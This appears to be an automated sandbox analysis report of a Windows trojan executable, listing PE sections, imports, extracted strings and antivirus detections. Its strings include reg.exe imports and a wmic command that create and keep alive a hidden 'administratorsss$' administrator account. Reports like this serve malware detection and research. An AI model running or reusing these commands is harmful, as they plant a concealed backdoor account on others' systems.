PE Compile Time

2021-06-10 20:55:04

PE Imphash

5aee102ebddeb7518a093ed62315b89d

PEiD Signatures

Armadillo v1.71

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00011386    0x00012000        6.39050051564
.rdata  0x00013000       0x0000457e    0x00005000        4.09463085997
.data   0x00018000       0x00007710    0x00004000        2.04502147526
.rsrc   0x00020000       0x00000298    0x00001000        3.50677820117

Resources

Name        Offset      Size        Language      Sub-language                File type
RT_VERSION  0x00020058  0x00000240  LANG_CHINESE  SUBLANG_CHINESE_SIMPLIFIED  data

Imports

Library KERNEL32.dll:
0x41306c RtlUnwind
0x413070 RaiseException
0x413074 HeapSize
0x413078 TerminateProcess
0x41307c GetACP
0x413088 FlushFileBuffers
0x413094 SetHandleCount
0x413098 GetStdHandle
0x41309c GetFileType
0x4130a4 GetVersionExA
0x4130a8 HeapDestroy
0x4130ac HeapCreate
0x4130b0 VirtualFree
0x4130b8 VirtualAlloc
0x4130bc IsBadWritePtr
0x4130c0 LCMapStringA
0x4130c4 LCMapStringW
0x4130c8 GetStringTypeA
0x4130cc GetStringTypeW
0x4130d0 Sleep
0x4130d4 IsBadCodePtr
0x4130d8 InterlockedExchange
0x4130dc SetFilePointer
0x4130e0 WriteFile
0x4130e4 ReadFile
0x4130e8 GetCurrentProcess
0x4130ec GetOEMCP
0x4130f0 GetCPInfo
0x4130f4 MultiByteToWideChar
0x4130f8 WideCharToMultiByte
0x413100 GlobalFlags
0x413104 lstrcmpA
0x413108 GetProcessVersion
0x41310c GetLastError
0x413110 SetLastError
0x413114 LoadLibraryA
0x413118 FreeLibrary
0x41311c GlobalGetAtomNameA
0x413120 lstrcmpiA
0x413124 GlobalAddAtomA
0x413128 GlobalFindAtomA
0x41312c GlobalDeleteAtom
0x413130 GetProcAddress
0x413134 GetVersion
0x41313c TlsGetValue
0x413140 LocalReAlloc
0x413144 TlsSetValue
0x413148 SetStdHandle
0x413150 GlobalAlloc
0x413154 GlobalReAlloc
0x413158 GlobalLock
0x413160 TlsFree
0x413164 GlobalHandle
0x413168 GlobalUnlock
0x41316c GlobalFree
0x413174 TlsAlloc
0x41317c LocalFree
0x413180 LocalAlloc
0x413184 GetCurrentThreadId
0x413188 lstrlenA
0x41318c lstrcpynA
0x413190 GetModuleFileNameA
0x413194 lstrcpyA
0x413198 lstrcatA
0x41319c SetErrorMode
0x4131a0 DeleteFileA
0x4131a4 GetStartupInfoA
0x4131a8 CreateProcessA
0x4131ac WaitForSingleObject
0x4131b0 CloseHandle
0x4131b4 IsBadReadPtr
0x4131b8 HeapFree
0x4131bc HeapReAlloc
0x4131c0 HeapAlloc
0x4131c4 ExitProcess
0x4131c8 GetProcessHeap
0x4131cc GetCommandLineA
0x4131d4 GetModuleHandleA
Library USER32.dll:
0x4131dc AdjustWindowRectEx
0x4131e0 SetFocus
0x4131e4 GetSysColor
0x4131e8 MapWindowPoints
0x4131ec PostMessageA
0x4131f0 LoadIconA
0x4131f4 SetWindowTextA
0x4131f8 IsWindowEnabled
0x4131fc LoadCursorA
0x413200 GetSysColorBrush
0x413204 ReleaseDC
0x413208 GetDC
0x41320c GetClassNameA
0x413210 PtInRect
0x413214 ClientToScreen
0x413218 PostQuitMessage
0x41321c DestroyMenu
0x413220 TabbedTextOutA
0x413224 DrawTextA
0x413228 GrayStringA
0x41322c CopyRect
0x413230 EnableWindow
0x413234 GetTopWindow
0x413238 GetCapture
0x41323c WinHelpA
0x413240 GetClassInfoA
0x413244 RegisterClassA
0x413248 GetMenu
0x41324c GetMenuItemCount
0x413250 GetSubMenu
0x413254 GetMenuItemID
0x413258 GetDlgItem
0x41325c GetWindowTextA
0x413260 GetDlgCtrlID
0x413264 DestroyWindow
0x413268 CreateWindowExA
0x41326c GetClassLongA
0x413270 SetPropA
0x413274 GetPropA
0x413278 CallWindowProcA
0x41327c RemovePropA
0x413280 DefWindowProcA
0x413284 GetMessageTime
0x413288 GetMessagePos
0x41328c GetLastActivePopup
0x413290 GetForegroundWindow
0x413294 GetWindow
0x413298 GetWindowLongA
0x41329c SetWindowLongA
0x4132a0 SetWindowPos
0x4132ac IsIconic
0x4132b0 GetWindowPlacement
0x4132b4 GetWindowRect
0x4132b8 GetSystemMetrics
0x4132c0 LoadBitmapA
0x4132c4 GetMenuState
0x4132c8 ModifyMenuA
0x4132cc SetMenuItemBitmaps
0x4132d0 CheckMenuItem
0x4132d4 EnableMenuItem
0x4132d8 GetFocus
0x4132dc GetParent
0x4132e0 GetNextDlgTabItem
0x4132e4 LoadStringA
0x4132e8 UnhookWindowsHookEx
0x4132ec MessageBoxA
0x4132f0 wsprintfA
0x4132f4 SetWindowsHookExA
0x4132f8 GetClientRect
0x4132fc DispatchMessageA
0x413300 SendMessageA
0x413304 GetKeyState
0x413308 CallNextHookEx
0x41330c PeekMessageA
0x413310 SetForegroundWindow
Library GDI32.dll:
0x413008 SelectObject
0x41300c GetStockObject
0x413010 SetMapMode
0x413014 SetViewportOrgEx
0x413018 OffsetViewportOrgEx
0x41301c SetViewportExtEx
0x413020 ScaleViewportExtEx
0x413024 SetWindowExtEx
0x413028 ScaleWindowExtEx
0x41302c RestoreDC
0x413030 PtVisible
0x413034 RectVisible
0x413038 TextOutA
0x41303c ExtTextOutA
0x413040 Escape
0x413044 SaveDC
0x413048 DeleteDC
0x41304c DeleteObject
0x413050 GetDeviceCaps
0x413054 GetObjectA
0x413058 SetBkColor
0x41305c SetTextColor
0x413060 GetClipBox
0x413064 CreateBitmap
Library WINSPOOL.DRV:
0x413318 DocumentPropertiesA
0x41331c ClosePrinter
0x413320 OpenPrinterA
Library COMCTL32.dll:
0x413000 None

!This program cannot be run in DOS mode.
`.rdata
@.data
CCmdTarget
CTempWnd
AfxOldWndProc423
AfxWnd42s
AfxControlBar42s
AfxMDIFrame42s
AfxFrameOrView42s
AfxOleControl42s
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
DISPLAY
commctrl_DragListMsg
InitCommonControlsEx
COMCTL32.DLL
CNotSupportedException
CMemoryException
CException
CObject
CMapPtrToPtr
combobox
CTempMenu
CTempGdiObject
CTempDC
CGdiObject
CUserException
CResourceException
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
ios::eofbit set
ios::failbit set
ios::badbit set
string too long
invalid string position
Unknown exception
GetModuleHandleA
GetCommandLineA
GetProcessHeap
ExitProcess
HeapAlloc
HeapReAlloc
HeapFree
IsBadReadPtr
CloseHandle
WaitForSingleObject
CreateProcessA
GetStartupInfoA
DeleteFileA
SetErrorMode
lstrcatA
lstrcpyA
GetModuleFileNameA
lstrcpynA
lstrlenA
GetCurrentThreadId
LocalAlloc
LocalFree
InitializeCriticalSection
TlsAlloc
DeleteCriticalSection
GlobalFree
GlobalUnlock
GlobalHandle
TlsFree
LeaveCriticalSection
GlobalLock
GlobalReAlloc
GlobalAlloc
EnterCriticalSection
TlsSetValue
LocalReAlloc
TlsGetValue
InterlockedDecrement
GetVersion
GetProcAddress
GlobalDeleteAtom
GlobalFindAtomA
GlobalAddAtomA
lstrcmpiA
GlobalGetAtomNameA
FreeLibrary
LoadLibraryA
SetLastError
GetLastError
GetProcessVersion
lstrcmpA
GlobalFlags
InterlockedIncrement
WideCharToMultiByte
MultiByteToWideChar
GetCPInfo
GetOEMCP
GetCurrentProcess
ReadFile
WriteFile
SetFilePointer
FlushFileBuffers
RtlUnwind
RaiseException
HeapSize
TerminateProcess
GetACP
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
SetUnhandledExceptionFilter
VirtualAlloc
IsBadWritePtr
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
IsBadCodePtr
KERNEL32.dll
MessageBoxA
wsprintfA
SetWindowsHookExA
PeekMessageA
CallNextHookEx
GetKeyState
SendMessageA
DispatchMessageA
UnhookWindowsHookEx
LoadStringA
GetNextDlgTabItem
GetParent
GetFocus
EnableMenuItem
CheckMenuItem
SetMenuItemBitmaps
ModifyMenuA
GetMenuState
LoadBitmapA
GetMenuCheckMarkDimensions
GetSystemMetrics
GetWindowRect
GetWindowPlacement
IsIconic
SystemParametersInfoA
RegisterWindowMessageA
SetWindowPos
SetWindowLongA
GetWindowLongA
GetWindow
SetForegroundWindow
GetForegroundWindow
GetLastActivePopup
GetMessagePos
GetMessageTime
DefWindowProcA
RemovePropA
CallWindowProcA
GetPropA
SetPropA
GetClassLongA
CreateWindowExA
DestroyWindow
GetDlgCtrlID
GetWindowTextA
GetDlgItem
GetMenuItemID
GetSubMenu
GetMenuItemCount
GetMenu
RegisterClassA
GetClassInfoA
WinHelpA
GetCapture
GetTopWindow
EnableWindow
CopyRect
GetClientRect
AdjustWindowRectEx
SetFocus
GetSysColor
MapWindowPoints
PostMessageA
LoadIconA
SetWindowTextA
IsWindowEnabled
LoadCursorA
GetSysColorBrush
ReleaseDC
GetClassNameA
PtInRect
ClientToScreen
PostQuitMessage
DestroyMenu
TabbedTextOutA
DrawTextA
GrayStringA
USER32.dll
CreateBitmap
GetClipBox
SetTextColor
SetBkColor
GetObjectA
GetDeviceCaps
DeleteObject
DeleteDC
SaveDC
RestoreDC
SelectObject
GetStockObject
SetMapMode
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowExtEx
ScaleWindowExtEx
PtVisible
RectVisible
TextOutA
ExtTextOutA
Escape
GDI32.dll
comdlg32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
InterlockedExchange
SetStdHandle
C:\Windows\System32\reg.exe import C:\Users\Public\administratorsss$2.reg
C:\Windows\System32\reg.exe import C:\Users\Public\administratorsss$.reg
wmic.exe UserAccount Where Name="administratorsss$"Set PasswordExpires="false"
C:\Users\Public\administratorsss$2.reg
C:\Users\Public\set.ini
Fatal Error: MFC initialization failed
program internal error number is %d.
program internal error number is %d.
:%d,%d
.PAVCException@@
.?AVCObject@@
.?AVCCmdTarget@@
.?AVCNoTrackObject@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AUCThreadData@@
.?AVCHandleMap@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AVCCmdUI@@
.?AVCWnd@@
.?AVCTestCmdUI@@
.?AVCTempWnd@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCMapPtrToPtr@@
.?AV_AFX_WIN_STATE@@
.?AVCMenu@@
.?AVCTempMenu@@
.?AVCDC@@
.?AVCGdiObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCResourceException@@
.?AVCUserException@@
.?AVtype_info@@
.?AVios_base@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@GU?$char_traits@G@std@@@std@@
.?AV?$basic_istream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_ostream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_filebuf@GU?$char_traits@G@std@@@std@@
.?AV?$basic_streambuf@GU?$char_traits@G@std@@@std@@
.?AVexception@@
.?AVruntime_error@std@@
.?AVfailure@ios_base@std@@
.?AVfacet@locale@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
VS_VERSION_INFO
StringFileInfo
080404B0
FileVersion
1.0.0.0
FileDescription
ProductName
ProductVersion
1.0.0.0
LegalCopyright
Comments
(http://www.eyuyan.com)
VarFileInfo
Translation

Antivirus Signature

Bkav Clean
Lionic Trojan.Win32.Agent.Y!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Ghanarava.16261643043288af
Skyhigh BehavesLike.Win32.Generic.cm
McAfee Artemis!235F16084A81
Cylance Unsafe
Zillya Trojan.Agent.Win32.2327172
Sangfor Trojan.Win32.Agent.ilbl
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:Win32/Generic.73d06a9c
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
huorong Trojan/Generic!9C57EE0C6C17CE8D
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec Trojan.Gen.MBT
tehtris Clean
ESET-NOD32 Win32/AddUser.CD
APEX Clean
Avast Win32:Malware-gen
Cynet Malicious (score: 99)
Kaspersky Trojan.Win32.Agent.ilbl
BitDefender Clean
NANO-Antivirus Trojan.Win32.Graftor.ixpgnn
ViRobot Clean
MicroWorld-eScan Clean
Tencent Malware.Win32.Gencirc.13e9a410
Sophos Generic Reputation PUA (PUA)
F-Secure Heuristic.HEUR/AGEN.1344124
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!59B0A83D7B4F
Trapmine suspicious.low.ml.score
CTX Clean
Emsisoft Application.Generic (A)
Ikarus Backdoor.Win32.Hupigon
FireEye Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira HEUR/AGEN.1344124
Fortinet Riskware/Application
Antiy-AVL Trojan/Win32.Agent
Kingsoft Clean
Gridinsoft Trojan.Win32.Agent.oa!s1
Xcitium Malware@#1dugr01jpw61d
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Program:Win32/Wacapew.C!ml
Google Detected
AhnLab-V3 Malware/Win.Generic.C4546359
Acronis Clean
VBA32 Trojan.Agent
TACHYON Clean
Malwarebytes PUP.Optional.ChinAd
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Agent!8.B1E (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
GData Clean
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
alibabacloud Clean

IRMA Signature

Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Clean
C4S ClamAV (Linux) Clean
Trellix (Linux) Clean
Sophos Anti-Virus (Linux) Mal/Generic-S
Bitdefender Antivirus (Linux) Clean
G Data Antivirus (Windows) Clean
WithSecure (Linux) Clean
ESET Security (Windows) Win32/AddUser.CD trojan
DrWeb Antivirus (Linux) Clean
ClamAV (Linux) Clean
eScan Antivirus (Linux) Clean
Kaspersky Standard (Windows) Trojan.Win32.Agent.ilbl
Emsisoft Commandline Scanner (Windows) Clean
Cuckoo
